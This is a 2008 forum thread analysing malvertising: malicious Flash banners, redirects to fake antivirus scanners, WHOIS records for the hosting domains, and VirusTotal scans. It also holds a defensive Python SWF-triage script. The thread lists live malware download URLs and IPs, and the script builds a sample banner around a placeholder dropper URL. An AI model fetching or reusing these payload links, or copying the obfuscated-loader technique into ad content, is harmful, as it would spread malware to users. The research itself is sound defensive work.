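Two things the simulation makes visible that the file does not: the patterns are unanchored substrings, so a referrer such as `http://www.mytask.example/` is caught by `.*ask.*$` too, and an empty Referer never triggers the rule, which is why the site owner browsing to his own pages directly saw nothing wrong. Run the audit over every .htaccess on the host, not only the document root, and rotate the FTP and control-panel credentials before trusting the cleaned file.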
Kimberly
<h4>
IP details: 87.248.180.88 - scanner.antivir64.com - greatvideo3.com - internet-defense2009.com
</h4>
87.248.180.88

*.sex2porn.com A
87-248-180-88.starnet.md PTR
bestrezult.com A
mail.xuixui.net A
xerxer.net A

Most are regged by DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

IP Location: Moldova, Republic Of Chisinau Sc Starnet Srl

inetnum: 87.248.176.0 - 87.248.191.255
netname: STARNETMD
descr: SC STARNET SRL
descr: Chisinau, Moldova
country: MD
admin-c: SA4929-RIPE
tech-c: SA4929-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
remarks: Leased for Users
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

role: StarNet Administrator
remarks:
address: SC "STARNET" SRL
address: 55, Maria Cibotari str.
address: MD2012 Chisinau
address: Moldova, Republic of
remarks:
phone: +373 (22) 844444
fax-no: +373 (22) 844445
remarks:
remarks: ----------------------------------------------
remarks: SC STARNET SRL
remarks: ISP in Republic of Moldova
remarks:
remarks: General questions:
remarks: Routing and Technical questions:
remarks: Last Update: 27.06.2008 ()
remarks: ----------------------------------------------
remarks:
remarks:
e-mail:
remarks:
admin-c: OB1145-RIPE
tech-c: OB1145-RIPE
admin-c: DG3460-RIPE
tech-c: DG3460-RIPE
admin-c: VF1333-RIPE
tech-c: VF1333-RIPE
nic-hdl: SA4929-RIPE
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.180.0/24
descr: StarNet SRL
descr: Chisinau, Moldova.
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.176.0/20
descr: SC STARNET SRL
descr: Chisinau, Moldova
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.160.0/19
descr: SC STARNET SRL
descr: Chisinau, Moldova
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.176.0/21
descr: StarNet SRL
descr: Chisinau, Moldova.
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered
______________________________

scanner.antivir64.com - 78.157.142.7 - 91.203.92.64

Website Title: Antivir64
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-08-08
Expires: 2009-08-08
Updated: 2008-08-09
Registrar Status: clientTransferProhibited
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,805 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: ANTIVIR64.COM

Registrant:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Creation Date: 08-Aug-2008
Expiration Date: 08-Aug-2009

Domain servers in listed order:
managedns4.estboxes.com
managedns3.estboxes.com
managedns2.estboxes.com
managedns1.estboxes.com

Administrative Contact:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Technical Contact:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Billing Contact:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

hostnames sharing ip with a-records
  • *.antivir64.com
  • antivir64.com
  • antivirus-2008a-pro.com
  • antivirus-2008y-pro.com
______________________________

greatvideo3.com - internet-defense2009.com - 84.16.252.73

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-08-12
Expires: 2009-08-12
Updated: 2008-08-12
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 754 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: greatvideo3.com is hosted on a dedicated server.

Whois Record
Domain Name: GREATVIDEO3.COM

Creation Date: 12-Aug-2008
Expiration Date: 12-Aug-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

hostnames sharing ip with a-records
  • 3gigabytes.com
  • 84-16-252-73.internetserviceteam.com
  • internet-defense2009.com
  • mail.antispyguard-scanner.com
  • mail.onlinexpsecurity.com
  • myfreespace3.com
  • updatesantivirus.com
  • windows-defense.com
______________________________
Kimberly
<h4>
www.newsweek.com - www.easy-forex.com
</h4>
A new malvertizement is being displayed on www.newsweek.com featuring www.easy-forex.com. Again the malvertizement has been created with Fuse Kit 2.1.4.

Screenshot in situ.
IPB Image
Banner.
media.washingtonpost.com/wp-adv/advertisers/trackstar/easyforex_728x90.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
adoptserver.info/state_.gif?url=[removed]
At the time of the write-up the full redirect was inactive.
______________________________

Let's have a closer look at the URL
media.washingtonpost.com/wp-adv/advertisers/trackstar/easyforex_728x90.swf
We notice the presence of trackstar. I think we may link this to trackstarmedia, which was caught a couple of days ago distributing the cardstore.com malvertizement. References here and here.

The malicious banner being hosted at the Washington Post, I would advise extreme caution when visiting washingtonpost.com and any website serving media content from them. The discovery of this malvertizement confirms the report from 14th August 2008 seen in Clipboard Loop - repeated copies from browser - virus?
It just happened again, this time on my XP laptop.
While on MSNBC.com frontpage, I clicked on a link to a newsweek article about Obama's comments on tire pressure. Bam! Next thing I know, I'm at a malware site: hxxp://webscannerfreever.com (don't go there!!!!!) and it's claiming to have found all sorts of malware on my PC, and keeps trying to initiate a download. I must have cancelled the thing 20 times before I could get my browser to go back (click the back button). Then I landed on the Newsweek page, which must have flashed by. ......
Note: Bold & color emphasis are mine.

The "clipboard issue" is also mentioned in that article. I can confirm that some of those websites copy their link to the clipboard, as I experienced myself on 13th July 2008 with a banner hosted on ifrance. Reported here. There is no need to reboot the computer or log off ... just follow the instructions below.
  1. Close the tabs with the advertisement, redirect ... or even better, close your browser.
  2. Click Start > Run
  3. In the edit box type clipbrd followed by Enter.
  4. The actual content of the clipboard will be displayed.
    IPB Image
  5. Click the delete button and confirm with Yes.
Kimberly
<h4>
adtds.trackads.net / adtds2.promoplexer.com updates
</h4>
adtds.trackads.net / adtds2.promoplexer.com new redirecting domains ...

superupload2.com
superupload2.com/soft.php?aid=0593&d=3&product=XPA
Jump to
internet-scanner2009.com/2009/1/_freescan.php?aid=880593
mytube4.com
mytube4.com/soft.php?aid=011807&d=2&product=XPA
Jump to
internetscanner2009.com/2009/1/freescan.php?aid=77011807
<h4>
IP details
</h4>
superupload2.com - 84.16.227.62

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-08-12
Expires: 2009-08-12
Updated: 2008-08-12
Name Server: NS1.MYNICK.NAME (has 756 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: superupload2.com is hosted on a dedicated server.

Domain Name: SUPERUPLOAD2.COM

Creation Date: 12-Aug-2008
Expiration Date: 12-Aug-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

hostnames sharing ip with a-records
  • bestpictures2.com
  • globala2.com
  • internet-scanner2009.com
  • windows-scanner.com
  • www.jupanu.ro
______________________________

mytube4.com - 58.65.238.106

Website Title: None given.
ICANN Registrar: BIZCN.COM, INC.
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-31
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 756 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.bizcn.com

IP Location - Hong Kong - Hostfresh

Whois Record
Domain name: mytube4.com

Registrant Contact:
DomainsReg, Inc.
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Administrative Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Technical Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Billing Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

DNS:
ns1.mynick.name
ns2.mynick.name
ns3.mynick.name
ns4.mynick.name

Created: 2008-07-30
Expires: 2009-07-30

hostnames sharing ip with a-records
  • antispyguard-scanner.com
  • browsersecuritycenter.com
  • fastupdateserver.com
  • microsoft.browserprotectioncenter.com
  • online-xpcleaner.com
  • webscweb-scannerfree.com
  • xpantivirussecurity.com
______________________________

internet-scanner2009.com - 84.16.227.62

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-08-12
Expires: 2009-08-12
Updated: 2008-08-12
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 756 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Domain Name: INTERNET-SCANNER2009.COM
Creation Date: 12-Aug-2008
Expiration Date: 12-Aug-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

hostnames sharing ip with a-records
  • bestpictures2.com
  • globala2.com
  • windows-scanner.com
  • www.jupanu.ro
______________________________

internetscanner2009.com - 89.149.229.168

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-08-15
Expires: 2009-08-15
Updated: 2008-08-15
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,809 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

IP Location - Berlin - Berlin - Netdirekt E.k

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: INTERNETSCANNER2009.COM

Registrant:
Protect Details, Inc
Domain Manager ()
29 Kompozitorov st.
Saint Petersburg
,194358
RU
Tel. +7.8129342271

hostnames sharing ip with a-records
  • 89-149-229-168.internetserviceteam.com
  • ns2.persfeed.com
  • ns2.proupver.net
Kimberly
<h4>
Thoughts about the recent wave of reports ...
</h4>
Lots of people have been reporting redirects lately, as seen on Sandi's blog. Let me quote a sentence from the latest blog entry.
It worries me that I am seeing complaints about malvertizing-like symptoms all over the net implicating - not only newsweek, but at other big name sites like MSNBC, Facebook, lime.com, Hotmail, MySpace and Yahoo.
It worries me too and I have been poking around at different sites without any success, until another idea, supposition, theory (call it whatever you want) crossed my mind when looking at some content displayed at MSNBC. In different places, from time to time, there's an external link to ... newsweek.com

On today.msnbc ...
IPB Image
There is also a small box with Top msnbc.com stories.
IPB Image
When clicking on the article I ended up at newsweek and the malicious easy-forex banner was there again.
IPB Image
If you are completely redirected and not familiar with them, you *might* eventually think that the malvertizement was located on msnbc.com, no? When you are interested in an article, you don't always hover over the link and watch the status bar before clicking on it either, so you will never see the Newsweek site, or it will just "flash by". Let's go a step further now. On newsweek.com you can add an article to social networks such as Digg It, Newsvine, Del.icio.us, Facebook, Yahoo Buzz, MySpace.
IPB Image
Let's fly over to Digg It. A search reveals quite a few links to Newsweek articles. I clicked on one link and yes, I did hit that easy-forex malvert again. Again, if fully redirected you won't see Newsweek and Digg It will be the "culprit".
IPB Image
Note that I used "open in new window" in my browser, as I was expecting this to happen (well, a 90% chance).

My Yahoo allows content from msnbc.com to be added. The module is called Top MSNBC Headlines. Yet another possible link in addition to Yahoo Buzz ...
IPB Image
At MySpace a search for newsweek articles reveals 1180 results ...
IPB Image
See where I'm going with this? One "well placed" malvertizement may lead to a huge number of affected users, and the fact that the malvertizement is often displayed upon entering the website may lead one to think that they got hit "elsewhere". Of course there might be more malicious banners around, I don't exclude that possibility at all. It's not the first time we've seen them hit several big sites at the same time. This theory doesn't explain lime.com or Hotmail, for example.
Kimberly
<h4>
In-text advertising
</h4>
I suppose most of you are familiar with In-text advertising, which is a form of contextual advertising. IntelliTXT and Kontera are such providers. You're never gonna believe it, they show up there too now. Hovering over Fujitsu did bring up an advertisement for a fake online scanner called winspywarescanner.com
IPB Image
Below is the association of the word Fujitsu with its advertising content on the Kontera server.
IPB Image
If you accidentally click on it, you will follow the redirects below and end up at the fake scanner.
c.enhance.com/c?e1=[removed]
c.enhance.com/c/2?e1=[removed]
scan.free-antispyware-scanner.com/110029/3/
IPB Image
Some of those in-text advertising ads are Flash files ... I'll let you readers imagine the rest.
IPB Image

Kimberly
<h4>
Fuse Kit
</h4>
The recent malvertizement featuring easy-forex has led to quite some attention around Fuse Kit. From Moses's comment:
I hope that you, Kimberly and the others will retract these implications that Fuse is somehow responsible for things it is not even capable of.
Let's get things straight. The bad guys are writing their own procedures in Fuse code, that is a fact, and I've written to Moses about that. It does NOT mean that Fuse is bad, it's being "MISUSED" just like they use ActionScript 2.0 & 3.0 to obfuscate data.

Sandy did partially illustrate this here, I can as well disclose the rest.

Right side the malvert, left side a clean easy-forex advertisement (from bannersonline).

Text Fields.
IPB Image IPB Image
We also notice the presence of 4 Misc Tags in the bad advertisement, they are Fuse export assets.

Scripts.
IPB Image IPB Image
Text 4 in the SWF file is used to hold an obfuscated string.
IPB Image
IPB Image
Text 4 is named "id".
IPB Image
Below is the declaration of the vars used in the altered Fuse.as. We notice:
  1. a reference to "id", which is our text 4 string.
  2. _nsFunc = "split" - we know that they use "split" to break long strings into parts.
  3. _nJid = ",la," - the identifier used to break the string into parts
IPB Image
Below is a snippet of the code that decrypts and builds the URLs, and the use of split & join.
IPB Image
When I first saw the scrambled text, I initially thought it was XORed, but that isn't the case. The "bad guys" wrote a complex set of functions to decode the "obfuscated" text. By no means are these part of the initial Fuse package / library. They have added their own code to the Fuse library, disguised as animation functionality, in order to make people think it is part of Fuse, which is NOT the case. Fuse is not capable of any sort of encryption, decryption or network activity.

<h4>
Mashable.com - MediaMan
</h4>
A MediaMan malvertizement has been discovered on Mashable.com and Google Adsense is implicated - Reference.
I did issue a warning about that possibility on April 18 2008 after reading an incident involving TheMishMash.com - Reference.
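A way to pull those constants out of a banner without opening it in a decompiler, as an added example that is not code from this thread or from the Fuse Kit: the script below reads an FWS/CWS file, walks the tag stream, collects the string constants pushed by the ActionScript 2 bytecode in DoAction/DoInitAction tags, and flags the indicators discussed above (a short custom delimiter such as ",la,", split/join, loader calls, URLs and .exe names, and the $version player property that version-checking loaders read). The indicator set and the size threshold are assumptions, the sample SWF it builds for itself is constructed, and example.invalid is a placeholder host.

```python
"""SWF triage: decompress, walk the tag stream, pull the string constants out
of the ActionScript 2 bytecode and flag the obfuscation indicators discussed
in this thread.  Added example; not code from the thread or from Fuse Kit."""
import re
import struct
import zlib

DO_ACTION, DO_INIT_ACTION, ACTION_PUSH = 12, 59, 0x96

# Indicator set is an assumption built from the analysis above: a short
# custom delimiter such as ",la,", split/join, loader calls, URLs and .exe
# names, and the $version player property.
INDICATORS = {
    "custom_delimiter": re.compile(r"^,[A-Za-z]{1,4},$"),
    "split_join": re.compile(r"^(split|join)$"),
    "loader": re.compile(r"^(loadMovie|loadMovieNum|getURL|MovieClipLoader)$"),
    "url": re.compile(r"^https?://", re.I),
    "exe": re.compile(r"\.exe$", re.I),
    "flash_version": re.compile(r"\$version$"),
}
# ActionPush value types: 0 string, 1 float, 2 null, 3 undefined, 4 register,
# 5 boolean, 6 double, 7 integer, 8/9 constant-pool index (operand widths)
PUSH_WIDTHS = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}


def decompress_swf(data: bytes) -> bytes:
    """Return the body after the 8-byte header; CWS bodies are zlib-compressed."""
    if data[:3] == b"FWS":
        return data[8:]
    if data[:3] == b"CWS":
        return zlib.decompress(data[8:])
    raise ValueError("not an FWS/CWS file (LZMA 'ZWS' not handled here)")


def iter_tags(body: bytes):
    """Yield (code, payload) for each tag after the RECT, frame rate and count."""
    nbits = body[0] >> 3                      # RECT: 5-bit size, then 4 fields
    pos = (5 + 4 * nbits + 7) // 8 + 4        # + u16 frame rate + u16 frame count
    while pos + 2 <= len(body):
        (hdr,) = struct.unpack_from("<H", body, pos)
        pos += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:                    # long form: u32 length follows
            (length,) = struct.unpack_from("<I", body, pos)
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                         # End tag
            break


def action_strings(payload: bytes):
    """Walk an AS2 action record and collect the strings pushed by ActionPush."""
    out, pos = [], 0
    while pos < len(payload):
        op = payload[pos]
        pos += 1
        if op == 0:
            break
        if op < 0x80:                         # single-byte action, no operands
            continue
        (length,) = struct.unpack_from("<H", payload, pos)
        pos += 2
        data = payload[pos:pos + length]
        pos += length
        if op != ACTION_PUSH:
            continue
        i = 0
        while i < len(data):
            t = data[i]
            i += 1
            if t == 0:                        # NUL-terminated string
                end = data.find(b"\0", i)
                if end < 0:
                    break
                out.append(data[i:end].decode("latin-1"))
                i = end + 1
            elif t in PUSH_WIDTHS:
                i += PUSH_WIDTHS[t]
            else:
                break
    return out


def triage(data: bytes) -> dict:
    """Return the pushed strings and, per indicator, the strings that matched."""
    strings = []
    for code, payload in iter_tags(decompress_swf(data)):
        if code == DO_INIT_ACTION:
            payload = payload[2:]             # u16 sprite id precedes the actions
        if code in (DO_ACTION, DO_INIT_ACTION):
            strings.extend(action_strings(payload))
    hits = {}
    for s in strings:
        for name, rx in INDICATORS.items():
            if rx.search(s):
                hits.setdefault(name, []).append(s)
    return {"strings": strings, "hits": hits}


def build_sample(compressed: bool = True) -> bytes:
    """Constructed one-frame SWF whose only tag pushes the kind of constants
    described above; example.invalid is a placeholder, not a real banner."""
    actions = b""
    for s in [",la,", "split", "join", "$version",
              "http://example.invalid/dropper.exe", "loadMovie"]:
        enc = b"\0" + s.encode() + b"\0"      # type 0 = string, NUL-terminated
        actions += bytes([ACTION_PUSH]) + struct.pack("<H", len(enc)) + enc
    actions += b"\0"                          # ActionEnd
    tag = struct.pack("<HI", (DO_ACTION << 6) | 0x3F, len(actions)) + actions
    body = b"\x00" + struct.pack("<HH", 12 << 8, 1) + tag + b"\0\0"  # RECT, 12 fps, 1 frame, End
    header = (b"CWS" if compressed else b"FWS") + bytes([8]) + struct.pack("<I", 8 + len(body))
    return header + (zlib.compress(body) if compressed else body)


if __name__ == "__main__":
    print(triage(build_sample())["hits"])
```

Run against a real file with `triage(open(path, "rb").read())`; a delimiter hit together with split/join and a loader call is the combination worth a closer look, while a lone URL in a legitimate clickTAG banner is normal.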
Kimberly
<h4>
ContentLink (Kontera) In-text advertising - Tubes
</h4>
On Aug 18 2008, I noticed an in-text advertisement for winspywarescanner.com and I said:
Some of those in-text advertising ads are Flash files ... I'll let you readers imagine the rest.
Well here is one, featuring Tubes. Seeing the campaign, it's not a recent one, but at least it proves that you can encounter those malicious banners with in-text advertising. The text associated with such an advertisement is identified by a double underline to differentiate it from regular hyperlinks. An in-page window containing advertising content appears when the cursor is positioned over the corresponding text. Below is an example that illustrates the concept.
IPB Image
______________________________

Banner.
images.kontera.com/[removed]/14_58_20_2914263.swf
IPB Image IPB Image IPB Image
Campaign.
mysurvey4u.com/crossdomain.xml
mysurvey4u.com/stats.php?campaign=f1owvast&u=1219640516279
Kimberly
<h4>
tunnel28.swf - i1.exe
</h4>
File.
bannersrotator.com/fx22010/start/tunnel28.swf
Link inside.
92.62.101.13/i1.exe
Visible signs.
O4 - HKCU\..\Run: [A00FD6648.exe] C:\DOCUME~1\KLY\LOCALS~1\Temp\_A00FD6648.exe
O20 - Winlogon Notify: __c00ED7D6 - C:\WINDOWS\system32\__c00ED7D6.dat
<h4>
Virustotal
</h4>
Filename: tunnel28.swf

File size: 1351 bytes
MD5...: 302093a28197f6eb49fc73dbb4a278f9
SHA1..: 034caeb20d248c96c6bf92668dedf5b03f5c7e5e
SHA256: cb539426eefa4d5b1448992b7fb8a6bde7f1b9b457fb85f403851e18cb3a87c0
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File tunnel28.swf received on 09.02.2008 18:07:03 (CET)
AhnLab-V3 2008.9.3.0 2008.09.02 -
AntiVir 7.8.1.23 2008.09.02 EXP/Flash.Gen
Authentium 5.1.0.4 2008.09.02 -
Avast 4.8.1195.0 2008.09.02 SWF:CVE-2007-0071
AVG 8.0.0.161 2008.09.02 -
BitDefender 7.2 2008.09.02 -
CAT-QuickHeal 9.50 2008.09.02 SWF.Exploit
ClamAV 0.93.1 2008.09.02 -
DrWeb 4.44.0.09170 2008.09.02 -
eSafe 7.0.17.0 2008.09.02 -
eTrust-Vet 31.6.6064 2008.09.02 -
Ewido 4.0 2008.09.02 -
F-Prot 4.4.4.56 2008.09.02 -
F-Secure 8.0.14332.0 2008.09.02 -
Fortinet 3.14.0.0 2008.09.02 -
GData 19 2008.09.02 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.09.02 -
K7AntiVirus 7.10.437 2008.09.02 -
Kaspersky 7.0.0.125 2008.09.02 -
McAfee 5374 2008.09.01 -
Microsoft 1.3807 2008.09.02 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3407 2008.09.02 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.02 -
Panda 9.0.0.4 2008.09.02 -
PCTools 4.4.2.0 2008.09.02 -
Prevx1 V2 2008.09.02 -
Rising 20.60.11.00 2008.09.02 Hack.Exploit.Swf.a
Sophos 4.33.0 2008.09.02 Exp/SWFScene-A
Sunbelt 3.1.1592.1 2008.08.30 -
Symantec 10 2008.09.02 Bloodhound.Exploit.193
TheHacker 6.3.0.8.069 2008.09.01 -
TrendMicro 8.700.0.1004 2008.09.02 -
VBA32 3.12.8.4 2008.09.02 -
ViRobot 2008.9.2.1361 2008.09.02 -
VirusBuster 4.5.11.0 2008.09.02 -
Webwasher-Gateway 6.6.2 2008.09.02 Exploit.Flash.Gen
______________________________

Filename: i1.exe

File size: 34304 bytes
MD5...: 41aa2979669cf968802bfcffb5ea9fc0
SHA1..: f84fbc23101c13784b2aea52bf7490858ee07135
SHA256: d36b5d3499f0300f67dc5547f153222eae87c635632e68927312138ec31f0242
PEiD..: -
QUOTE
File i1.exe received on 09.02.2008 18:07:45 (CET)
AhnLab-V3 2008.9.3.0 2008.09.02 -
AntiVir 7.8.1.23 2008.09.02 TR/Drop.Ag.34304.FW
Authentium 5.1.0.4 2008.09.02 -
Avast 4.8.1195.0 2008.09.02 Win32:Trojan-gen {Other}
AVG 8.0.0.161 2008.09.02 Adload_r.AQ
BitDefender 7.2 2008.09.02 -
CAT-QuickHeal 9.50 2008.09.02 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.09.02 -
DrWeb 4.44.0.09170 2008.09.02 -
eSafe 7.0.17.0 2008.09.02 Suspicious File
eTrust-Vet 31.6.6064 2008.09.02 -
Ewido 4.0 2008.09.02 -
F-Prot 4.4.4.56 2008.09.02 -
Fortinet 3.14.0.0 2008.09.02 PossibleThreat
GData 19 2008.09.02 Trojan.Win32.Agent.acao
Ikarus T3.1.1.34.0 2008.09.02 Trojan.Win32.Vundo.V
K7AntiVirus 7.10.437 2008.09.02 -
Kaspersky 7.0.0.125 2008.09.02 Trojan.Win32.Agent.acao
McAfee 5374 2008.09.01 Vundo
Microsoft 1.3807 2008.09.02 Trojan:Win32/Vundo.gen!V
NOD32v2 3407 2008.09.02 Win32/Small.NEB
Norman 5.80.02 2008.09.02 Tibs.gen222
Panda 9.0.0.4 2008.09.02 -
PCTools 4.4.2.0 2008.09.02 -
Prevx1 V2 2008.09.02 Malicious Software
Rising 20.60.11.00 2008.09.02 -
Sophos 4.33.0 2008.09.02 -
Sunbelt 3.1.1592.1 2008.08.30 -
Symantec 10 2008.09.02 Trojan Horse
TheHacker 6.3.0.8.069 2008.09.01 -
TrendMicro 8.700.0.1004 2008.09.02 -
VBA32 3.12.8.4 2008.09.02 -
ViRobot 2008.9.2.1361 2008.09.02 -
VirusBuster 4.5.11.0 2008.09.02 -
Webwasher-Gateway 6.6.2 2008.09.02 Trojan.Drop.Ag.34304.FW
<h4>
IP details
</h4>
bannersrotator.com - 82.98.193.165

Website Title: 403 Forbidden
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-31
Expires: 2009-07-31
Updated: 2008-08-05
Name Server: NS13.ZONEEDIT.COM (has 186,960 domains)
Name Server: NS16.ZONEEDIT.COM
Whois Server: whois.publicdomainregistry.com

Server Type: Apache/2.2.6 (Unix) PHP/5.2.4
IP Location - Netherlands - Cyber Technology Bvba/sprl
Dedicated Hosting: bannersrotator.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: BANNERSROTATOR.COM

Registrant:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774

Creation Date: 31-Jul-2008
Expiration Date: 31-Jul-2009

Domain servers in listed order:
ns13.zoneedit.com
ns16.zoneedit.com

Administrative Contact:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774

Technical Contact:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774

Billing Contact:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774
______________________________

92.62.101.13

IP Location: Estonia Starline Web Services
Resolve Host: ds13.esthost.eu

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 92.0.0.0 - 92.255.255.255
CIDR: 92.0.0.0/8
NetName: 92-RIPE
NetHandle: NET-92-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SUNIC.SUNET.SE
NameServer: NS3.NIC.FR
NameServer: NS-EXT.ISC.ORG
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2007-03-27
Updated: 2007-04-03

== Additional Information From whois://whois.ripe.net:43 ==

inetnum: 92.62.101.0 - 92.62.101.255
netname: STARLINE_EE
descr: Starline Web Services
country: EE
admin-c: VN268-RIPE
tech-c: VN268-RIPE
status: ASSIGNED PA
mnt-by: AS39823-MNT
source: RIPE # Filtered

person: Viktor Norin
address: Pae 21
address: Tallinn
address: Estonia
nic-hdl: VN268-RIPE
phone: +3726370911
abuse-mailbox:
source: RIPE # Filtered

route: 92.62.96.0/20
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered

Websites
  1. Andromeda-av.com
  2. Andromeda-av.net
  3. Sevlg.info
  4. sevlg.com
  5. sevlg.org
Reported here.
Kimberly
<h4>
www.cnbc.com - Winning Surveys ... Which Coffee is better
</h4>
Two malvertizements are being displayed at www.cnbc.com featuring Winning Surveys - Which Coffee is Better. Fuse Kit 2.1.4 functions were added to the initial Fuse code for these creatives.

Screenshots in situ.
IPB Image
IPB Image
Banners.
spe.atdmt.com/ds/MSMSNMATCVNI/728x90_logo.swf
IPB Image

spe.atdmt.com/ds/MSMSNMATCVNI/300x250_logo.swf
IPB Image
At the time of the write-up the full redirect was inactive.
Kimberly
<h4>
Nancy Drew - Circulating malvertisement
</h4>
Updated Nancy Drew Solves Mysteries In Style malvertizement. Again no redirect to a fake online scanner but an executable.

Banner.
IPB Image
Redirect.
82.98.235.224/roy/lsd_k12.exe?sid=unknown
IPB Image
______________________________

Filename: lsd_k12.exe

File size: 203776 bytes
MD5...: ab287317da4be2a404a41662cd22f34e
SHA1..: c4cbcea2b441d5f7e2040f7c8aacb84c266d3285
